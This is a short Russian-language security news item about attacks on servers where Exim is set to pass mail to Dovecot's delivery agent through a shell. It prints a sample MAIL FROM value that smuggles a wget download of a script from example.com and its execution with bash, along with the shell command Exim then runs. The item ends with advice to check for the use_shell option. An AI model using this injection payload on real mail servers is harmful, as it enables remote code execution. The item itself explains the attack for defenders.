ISC: Зафиксированы атаки с использованием связки Exim и Dovecot

Эксперты Центра противодействия угрозам в Сети (Internet Storm Center, ISC) зафиксировали рост количества атак, совершенных посредством использования уязвимой конфигурации приложений Exim и Dovecot.

По окончанию атаки на сервер устанавливается perl-скрипт /tmp/p.pl, который на подобие IRC-серверов обрабатывает определенные управляющие команды.

В случае использования Exim в качестве почтового сервера, его можно настроить на перенаправление сообщений во внешнюю программу с целью расширить возможности фильтрации и доставки email. Обычная конфигурация содержит агент по доставке писем Dovecot, который поддерживает работу серверов pop3 и imap.

Инфицирование сервера происходит посредством рассылки спам-писем. Они эксплуатируют уязвимость через заголовок Return-Path, обрабатывая который Exim запускает утилиту wget, загружает скрипт и запускает его.

Примером проведенной атаки можно назвать следующее. Так, в случае указания злоумышленником:

MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com

Exim выполнит:

/bin/sh -c "/usr/lib/Dovecot/deliver -e -k -s -f \"red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com"

Это, в свою очередь, приведет к запуску wget, загрузке внешнего скрипта c сайта example.com/test.sh и его выполнению.

Примечательно, что информация о брешах была  опубликована  еще в мае текущего года, однако до сих пор остается огромное количество уязвимых серверов.

Пользователям связки Exim и Dovecot следует проверить настройки на предмет отсутствия опции «use_shell», с помощоью которой Dovecot передает параметры в командную строку. Благодаря этому злоумышленники могут выполнять системные команды.